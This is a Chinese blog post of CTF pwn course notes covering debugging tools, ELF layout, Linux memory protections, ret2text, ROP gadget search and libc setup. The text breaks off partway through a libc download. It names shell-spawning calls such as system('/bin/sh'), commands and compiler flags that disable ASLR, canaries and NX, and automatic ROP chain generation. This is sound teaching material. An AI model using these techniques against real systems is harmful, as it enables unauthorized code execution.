<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="《重生之我在yctu做pwn手》系列视频笔记, StarrySky">
    <meta name="description" content="Love rises from the east and descends to the west,romance makes no changes until death.">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>《重生之我在yctu做pwn手》系列视频笔记 | StarrySky</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="StarrySky" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.jpg" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">StarrySky</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>文章</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>个人简介</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.jpg" class="logo-img circle responsive-img">
        
        <div class="logo-name">StarrySky</div>
        <div class="logo-desc">
            
            Love rises from the east and descends to the west,romance makes no changes until death.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			文章
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			个人简介
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/Steel%20Gray.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">《重生之我在yctu做pwn手》系列视频笔记</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/pwn/">
                                <span class="chip bg-color">pwn</span>
                            </a>
                        
                            <a href="/tags/%E6%95%99%E7%A8%8B/">
                                <span class="chip bg-color">教程</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/pwn/" class="post-category">
                                pwn
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2024-11-06
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    17 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="1-pwn环境配置"><a href="#1-pwn环境配置" class="headerlink" title="1.pwn环境配置"></a>1.pwn环境配置</h2><p>视频讲解：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1YT1oYeEVd">https://www.bilibili.com/video/BV1YT1oYeEVd</a></p>
<p>配置指令：<a href="https://starrysky1004.github.io/2024/10/05/pwn-huan-jing-pei-zhi/">https://starrysky1004.github.io/2024/10/05/pwn-huan-jing-pei-zhi/</a></p>
<h2 id="2-基础知识-amp-ret2text"><a href="#2-基础知识-amp-ret2text" class="headerlink" title="2.基础知识 &amp; ret2text"></a>2.基础知识 &amp; ret2text</h2><h3 id="PWN解题目标"><a href="#PWN解题目标" class="headerlink" title="PWN解题目标"></a>PWN解题目标</h3><p>获取远程靶机里的<code>flag</code>文件中的字符串（<code>flag</code>是<strong>动态</strong>的，每个队伍的<code>flag</code>不同）</p>
<ul>
<li><p>获取<code>shell</code>：和远程终端交互通过<code>cat flag</code>获取</p>
<p>可以获取<code>shell</code>的函数：**<code>system(&#39;/bin/sh&#39;)</code>**	<code>system(&#39;sh&#39;)</code>	<code>system(&#39;$0&#39;)</code></p>
<p>ps:读的是远程的<code>flag</code>文件，本地可以用<code>ls</code>确认是否获得<code>shell</code>或创建一个<code>flag</code>文件</p>
</li>
<li><p>读取<code>flag</code>（<code>open read write</code>）&#x2F; <code>system(&#39;cat flag&#39;)</code></p>
</li>
</ul>
<h3 id="前置基础"><a href="#前置基础" class="headerlink" title="前置基础"></a>前置基础</h3><h4 id="示例代码"><a href="#示例代码" class="headerlink" title="示例代码"></a>示例代码</h4><pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>

<span class="token keyword">char</span> hello<span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string">"Hello world!"</span><span class="token punctuation">;</span>
<span class="token keyword">int</span> buf<span class="token punctuation">[</span><span class="token number">10</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token keyword">int</span> <span class="token function">func</span><span class="token punctuation">(</span><span class="token keyword">int</span> a<span class="token punctuation">,</span> <span class="token keyword">int</span> b<span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">int</span> res<span class="token punctuation">;</span>
        res <span class="token operator">=</span> a <span class="token operator">+</span> b<span class="token punctuation">;</span>
        <span class="token keyword">return</span> res<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">int</span> a<span class="token punctuation">,</span> b<span class="token punctuation">,</span> c<span class="token punctuation">;</span>
        a <span class="token operator">=</span> <span class="token number">10</span><span class="token punctuation">;</span>
        b <span class="token operator">=</span> <span class="token number">20</span><span class="token punctuation">;</span>
        c <span class="token operator">=</span> <span class="token function">func</span><span class="token punctuation">(</span>a<span class="token punctuation">,</span> b<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Result is: %d"</span><span class="token punctuation">,</span> c<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>工具使用</h4><h5 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h5><p>在终端直接与远程程序交互：<code>nc ip port</code></p>
<h5 id="IDA"><a href="#IDA" class="headerlink" title="IDA"></a>IDA</h5><p>参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ve1kcon/p/17812418.html">https://www.cnblogs.com/ve1kcon/p/17812418.html</a></p>
<table>
<thead>
<tr>
<th>快捷键</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>n</td>
<td>重命名变量&#x2F;函数</td>
</tr>
<tr>
<td>y</td>
<td>修改函数原型或者变量类型</td>
</tr>
<tr>
<td>tab</td>
<td>在反汇编窗口中，进行<strong>汇编指令</strong>与<strong>伪代码</strong>之间的切换</td>
</tr>
<tr>
<td>esc</td>
<td>翻页，返回前一页面</td>
</tr>
<tr>
<td>space</td>
<td>在反汇编窗口中，进行<strong>列表视图</strong>与<strong>图形视图</strong>之间的切换</td>
</tr>
<tr>
<td>f12</td>
<td>打开字符串窗口，可用于字符串搜索</td>
</tr>
<tr>
<td>&#x2F;</td>
<td>添加注释</td>
</tr>
</tbody></table>
<h5 id="gdb"><a href="#gdb" class="headerlink" title="gdb"></a>gdb</h5><p>参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ve1kcon/p/17812420.html">https://www.cnblogs.com/ve1kcon/p/17812420.html</a></p>
<table>
<thead>
<tr>
<th>指令</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>gdb filename</td>
<td>进入调试可执行程序</td>
</tr>
<tr>
<td>r</td>
<td>开始&#x2F;重新运行程序</td>
</tr>
<tr>
<td>c</td>
<td>运行到断点&#x2F;结束</td>
</tr>
<tr>
<td>q</td>
<td>退出</td>
</tr>
<tr>
<td>n</td>
<td>单步调试</td>
</tr>
<tr>
<td>s</td>
<td>单步调试并跟进函数</td>
</tr>
<tr>
<td>p&#x2F;x</td>
<td>用于计算（相当于计算器）</td>
</tr>
<tr>
<td>vmmap</td>
<td>获取调试进程中的虚拟映射地址范围</td>
</tr>
<tr>
<td>x&#x2F;gx    x&#x2F;gi    x&#x2F;gs</td>
<td>以数据 &#x2F; 汇编 &#x2F; 字符串的形式查看内存（x&#x2F;20gx一次查看更多数据）</td>
</tr>
<tr>
<td>b *address &#x2F; function_name &#x2F; *$rebase(address)</td>
<td>绝对地址 &#x2F; 函数名 &#x2F; 相对地址下断点</td>
</tr>
<tr>
<td>fin</td>
<td>跳出当前函数，执行到函数返回处</td>
</tr>
<tr>
<td>context</td>
<td>重新打印页面信息</td>
</tr>
<tr>
<td>code</td>
<td>查看程序基址</td>
</tr>
<tr>
<td>libc</td>
<td>查看libc基址</td>
</tr>
</tbody></table>
<h5 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h5><p><code>checksec filename</code>	查看架构、端序、保护</p>
<h4 id="elf文件格式"><a href="#elf文件格式" class="headerlink" title="elf文件格式"></a>elf文件格式</h4><ul>
<li><p><code>.init、.fini</code>：保存了进程初始化和结束所用的代码，这两个节通常都是由编译器自动添加</p>
</li>
<li><p><code>plt、got</code>：动态链接的跳转和全局入口表</p>
</li>
<li><p><code>.text</code>：代码段</p>
</li>
<li><p><code>.rodata</code>：保存了只读数据，可以读取但不能修改</p>
<p>例如示例代码中的<code>&quot;Result is: %d&quot;</code></p>
</li>
<li><p><code>.data</code>：已初始化的全局变量和局部静态变量都保存在<code>.data</code>段</p>
<p>例如示例代码中的<code>&quot;Hello world!&quot;</code></p>
</li>
<li><p><code>.bss</code>：未初始化的全局变量和局部静态变量默认值都为<code>0</code></p>
<p><code>.bss</code>段只是为未初始化的全局变量和局部静态变量预留位置没有内容，所以它在文件中也不占据空间</p>
<p>例如示例代码中的<code>buf</code></p>
</li>
</ul>
<h4 id="函数调用过程"><a href="#函数调用过程" class="headerlink" title="函数调用过程"></a>函数调用过程</h4><h5 id="栈"><a href="#栈" class="headerlink" title="栈"></a>栈</h5><p>指数据<strong>暂时存储</strong>的地方，所以才有<u>入栈、出栈</u>的说法，入栈和出栈都在栈顶（即将数据存放到数据暂存区的顶部以及从顶部取出数据），局部非静态变量存储在栈中</p>
<h5 id="寄存器"><a href="#寄存器" class="headerlink" title="寄存器"></a>寄存器</h5><h6 id="64位"><a href="#64位" class="headerlink" title="64位"></a>64位</h6><p><u>一个地址占<code>8</code>字节，可以使用<code>pwntools</code>的<code>p64</code>生成一个<code>64</code>位的地址</u></p>
<p><strong>栈</strong>：<code>rbp</code> -&gt; 栈底	<code>rsp</code> -&gt; 栈顶</p>
<p><strong>当前执行指令寄存器</strong>：<code>rip</code></p>
<p><strong>传参</strong>：<code>rdi</code> -&gt; 一参	<code>rsi</code> -&gt; 二参	<code>rdx</code> -&gt; 三参</p>
<h6 id="32位"><a href="#32位" class="headerlink" title="32位"></a>32位</h6><p><u>一个地址占<code>4</code>字节，可以使用<code>pwntools</code>的<code>p32</code>生成一个<code>32</code>位的地址</u></p>
<p><strong>栈</strong>：<code>ebp</code>：栈底	<code>esp</code>：栈顶</p>
<p><strong>当前执行指令寄存器</strong>：<code>eip</code></p>
<p><strong>传参</strong>：通过栈传参</p>
<h5 id="函数调用"><a href="#函数调用" class="headerlink" title="函数调用"></a>函数调用</h5><p>详细过程讲解见视频</p>
<img src="/2024/11/06/chong-sheng-zhi-wo-zai-yctu-zuo-pwn-shou-xi-lie-shi-pin-bi-ji/1.png" class>

<h4 id="linux保护机制"><a href="#linux保护机制" class="headerlink" title="linux保护机制"></a>linux保护机制</h4><ul>
<li><p><code>ASLR：Address Space Layout Randomization</code></p>
<p><code>linux</code>地址随机化，程序运行时的堆栈以及共享库的加载地址随机化</p>
<p>关闭<code>ASLR</code>:<code>sudo sysctl -w kernel.randomize_va_space=0</code></p>
</li>
<li><p><code>RELRO：RELocation Read-Only</code></p>
<ol>
<li><p><code>Full RELRO</code>：<code>got</code>表不可写</p>
</li>
<li><p><code>Partial RELRO</code></p>
<pre class="line-numbers language-none"><code class="language-none">gcc编译时关闭relro参数：
-z norelro	完全关闭
-z lazy		部分开启
-z now		完全开启<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre></li>
</ol>
</li>
<li><p><code>stack</code></p>
<p><code>canary</code>，防止栈溢出，位于<code>rbp - 0x8</code></p>
<pre class="line-numbers language-none"><code class="language-none">gcc编译时关闭canary参数：
-fno-stack-protector<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</li>
<li><p><code>NX：Non-eXecute</code></p>
<ol>
<li><p><code>NX enable</code>：堆栈不可执行，仅<code>.text</code>段可执行</p>
</li>
<li><p><code>No NX</code></p>
<pre class="line-numbers language-none"><code class="language-none">gcc编译时关闭NX参数：
-z execstack	允许在堆栈上执行代码
-z noexecstack	禁止在堆栈上执行代码<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></li>
</ol>
</li>
<li><p><code>PIE</code></p>
<p>gcc编译，code，获取地址，下断点</p>
<ol>
<li><p><code>PIE enabled</code>：程序地址随机化</p>
</li>
<li><p><code>No PIE</code></p>
<pre class="line-numbers language-none"><code class="language-none">gcc编译时关闭PIE参数：
-no-pie<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre></li>
</ol>
</li>
</ul>
<h3 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h3><p>即返回到<code>text</code>段，劫持返回地址到后门（即覆盖<code>ret</code>为后门的地址）</p>
<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><p>输入长度没有被限制导致覆盖到<code>ret</code></p>
<p>例如：<code>gets</code>函数不限制输入长度</p>
<h4 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h4><ul>
<li>检查保护（确认<code>no pie</code>以及<code>no canary</code>）</li>
<li>确定后门地址、变量到栈底的距离（根据<code>IDA</code>中变量后的<code>rbp-xx</code>得到与栈底的距离为<code>xx</code>）</li>
<li>填充中间空间（变量到栈底的距离+<code>rbp</code>的长度）并覆盖<code>ret</code>为返回地址</li>
</ul>
<h4 id="交互脚本模板"><a href="#交互脚本模板" class="headerlink" title="交互脚本模板"></a>交互脚本模板</h4><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">'linux'</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span>

file_name <span class="token operator">=</span> <span class="token string">'./filename'</span>	<span class="token comment">#修改成可执行文件名</span>

debug <span class="token operator">=</span> <span class="token number">0</span>	<span class="token comment">#打远程时改成1</span>
<span class="token keyword">if</span> debug<span class="token punctuation">:</span>
    r <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'ip'</span><span class="token punctuation">,</span> port<span class="token punctuation">)</span>	<span class="token comment">#打远程时修改ip和端口</span>
<span class="token keyword">else</span><span class="token punctuation">:</span>
    r <span class="token operator">=</span> process<span class="token punctuation">(</span>file_name<span class="token punctuation">)</span>

elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span>file_name<span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">dbg</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    gdb<span class="token punctuation">.</span>attach<span class="token punctuation">(</span>r<span class="token punctuation">)</span>	<span class="token comment">#在需要调试的地方加上dbg()</span>

r<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="3-ret2libc"><a href="#3-ret2libc" class="headerlink" title="3.ret2libc"></a>3.ret2libc</h2><h3 id="前置基础-1"><a href="#前置基础-1" class="headerlink" title="前置基础"></a>前置基础</h3><h4 id="相关概念"><a href="#相关概念" class="headerlink" title="相关概念"></a>相关概念</h4><p><code>gadget</code>：程序本身或者<code>libc</code>中存在的一些汇编指令，每一条指令有其对应的地址，将这些<code>gadget</code>地址部署到栈中可以执行该地址中存放的汇编指令</p>
<p>​	例如：<code>ret2text</code>就是执行程序本身有的<code>system(&quot;/bin/sh&quot;);</code>指令</p>
<p><code>ROP</code>：一种利用现有程序中的代码片段（即<code>gadget</code>）来构造攻击的技术，通过构造一系列的<code>gadget</code>来实现攻击目标，也可以控制程序执行好几段不相邻的程序已有的代码</p>
<p>​	例如：在返回地址处按顺序填上函数<code>func1</code>、<code>func2</code>、<code>func3</code>的地址就会依次执行这三个函数，更多的是利用其中的汇编指令</p>
<h4 id="工具指令"><a href="#工具指令" class="headerlink" title="工具指令"></a>工具指令</h4><h5 id="ROPgadget"><a href="#ROPgadget" class="headerlink" title="ROPgadget"></a>ROPgadget</h5><p>获取<code>gadget</code>地址，<code>--binary</code>参数指定文件，可以是可执行文件或<code>libc</code>文件，<code>grep</code>用于筛选，<code>--string</code>用于筛选字符串</p>
<p>通过<code>pop rdi</code>可以将栈地址中的值传递给<code>rdi</code>寄存器，其他寄存器也同理，所以在构造<code>ROP</code>链时直接使用<code>p64(pop_rdi_ret) + p64(rdi_content)</code>即可控制<code>rdi</code>寄存器的值为<code>rdi_content</code></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--only</span> <span class="token string">'pop|ret'</span> <span class="token operator">|</span> <span class="token function">grep</span> <span class="token string">'rdi'</span>	<span class="token comment">#控制寄存器的值</span>
<span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--string</span> <span class="token string">'/bin/sh'</span>	<span class="token comment">#查找字符串</span>
<span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./libc-2.35.so <span class="token parameter variable">--only</span> <span class="token string">'leave|ret'</span> <span class="token operator">|</span> <span class="token function">grep</span> <span class="token string">'leave'</span>	<span class="token comment">#查找leave ret指令地址</span>
<span class="token variable">$Ropgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--ropchain</span>	<span class="token comment">#生成现成的rop利用链直接getshell，适用于静态编译的程序</span>
<span class="token variable">$ROPgadget</span> <span class="token parameter variable">--binary</span> ./pwn <span class="token parameter variable">--only</span> <span class="token string">'ret'</span>	<span class="token comment">#查找ret指令的地址</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="string"><a href="#string" class="headerlink" title="string"></a>string</h5><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$strings</span> ./libc.so.6  <span class="token operator">|</span> <span class="token function">grep</span> GNU	<span class="token comment">#获取libc版本</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h5 id="glibc-all-in-one"><a href="#glibc-all-in-one" class="headerlink" title="glibc-all-in-one"></a>glibc-all-in-one</h5><p>进入<code>glibc-all-in-one</code>文件夹下执行<code>./update_list</code>之后<code>cat list</code>确认是否有对应版本的<code>libc</code>，存在对应版本使用<code>./download libc版本名</code>进行下载，下载完成之后存在于<code>libs</code>文件夹下，需要用的时候将文件夹下的<code>libc</code>文件夹复制过去，下载失败可以直接复制下载地址到<code>windows</code>中下载再放到虚拟机里</p>
<p><strong>示例</strong></p>
<p>使用<code>strings</code>指令确定<code>libc</code>版本为<code>2.38-1ubuntu6</code>，使用<code>file</code>指令确定<code>32</code>位（也可以<code>checksec ./pwn</code>）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$strings</span> ./libc.so.6  <span class="token operator">|</span> <span class="token function">grep</span> GNU 
GNU C Library <span class="token punctuation">(</span>Ubuntu GLIBC <span class="token number">2.38</span>-1ubuntu6<span class="token punctuation">)</span> stable release version <span class="token number">2.38</span>.
Compiled by GNU CC version <span class="token number">13.2</span>.0.

<span class="token variable">$file</span> libc.so.6 
libc.so.6: ELF <span class="token number">32</span>-bit LSB shared object, Intel <span class="token number">80386</span>, version <span class="token number">1</span> <span class="token punctuation">(</span>GNU/Linux<span class="token punctuation">)</span>, dynamically linked, interpreter /lib/ld-linux.so.2, BuildID<span class="token punctuation">[</span>sha1<span class="token punctuation">]</span><span class="token operator">=</span>495fc00b597566b5e14e221f563afe29ec1d8478, <span class="token keyword">for</span> GNU/Linux <span class="token number">3.2</span>.0, stripped<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>确认<code>list</code>列表中存在该版本的<code>libc</code></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable">$cat</span> list    
<span class="token number">2.23</span>-0ubuntu11.3_amd64
<span class="token number">2.23</span>-0ubuntu11.3_i386
<span class="token number">2.23</span>-0ubuntu3_amd64
<span class="token number">2.23</span>-0ubuntu3_i386
<span class="token number">2.27</span>-3ubuntu1.5_amd64
<span class="token number">2.27</span>-3ubuntu1.5_i386
<span class="token number">2.27</span>-3ubuntu1.6_amd64
<span class="token number">2.27</span>-3ubuntu1.6_i386
<span class="token number">2.27</span>-3ubuntu1_amd64
<span class="token number">2.27</span>-3ubuntu1_i386
<span class="token number">2.31</span>-0ubuntu9.12_amd64
<span class="token number">2.31</span>-0ubuntu9.12_i386
<span class="token number">2.31</span>-0ubuntu9.7_amd64
<span class="token number">2.31</span>-0ubuntu9.7_i386
<span class="token number">2.31</span>-0ubuntu9_amd64
<span class="token number">2.31</span>-0ubuntu9_i386
<span class="token number">2.35</span>-0ubuntu3.4_amd64
<span class="token number">2.35</span>-0ubuntu3.4_i386
<span class="token number">2.35</span>-0ubuntu3_amd64
<span class="token number">2.35</span>-0ubuntu3_i386
<span class="token number">2.37</span>-0ubuntu2.1_amd64
<span class="token number">2.37</span>-0ubuntu2.1_i386
<span class="token number">2.37</span>-0ubuntu2_amd64
<span class="token number">2.37</span>-0ubuntu2_i386
<span class="token number">2.38</span>-1ubuntu6_amd64
<span class="token number">2.38</span>-1ubuntu6_i386<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>下载该版本的<code>libc</code>，如果下载失败可以直接复制里面的链接<code>https://mirror.tuna.tsinghua.edu.cn/ubuntu/pool/main/g/glibc/libc6_2.38-1ubuntu6_i386.deb</code>在<code>windows</code>里下载再存到虚拟机里，下载完成后位于<code>libs</code>文件夹中，需要使用时直接<code>cp -r ~/glibc-all-in-one/libs/2.38-1ubuntu6_i386 ./2.38</code>复制文件夹使用</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$./download <span class="token number">2.38</span>-1ubuntu6_i386                   
Getting <span class="token number">2.38</span>-1ubuntu6_i386
  -<span class="token operator">></span> Location: https://mirror.tuna.tsinghua.edu.cn/ubuntu/pool/main/g/glibc/libc6_2.38-1ubuntu6_i386.deb
  -<span class="token operator">></span> Downloading libc binary package
  -<span class="token operator">></span> Extracting libc binary package
x - debian-binary
x - control.tar.zst
x - data.tar.zst
/home/starrysky/glibc-all-in-one
  -<span class="token operator">></span> Package saved to libs/2.38-1ubuntu6_i386
  -<span class="token operator">></span> Location: https://mirror.tuna.tsinghua.edu.cn/ubuntu/pool/main/g/glibc/libc6-dbg_2.38-1ubuntu6_i386.deb
  -<span class="token operator">></span> Downloading libc debug package
  -<span class="token operator">></span> Extracting libc debug package
x - debian-binary
x - control.tar.zst
x - data.tar.zst
/home/starrysky/glibc-all-in-one
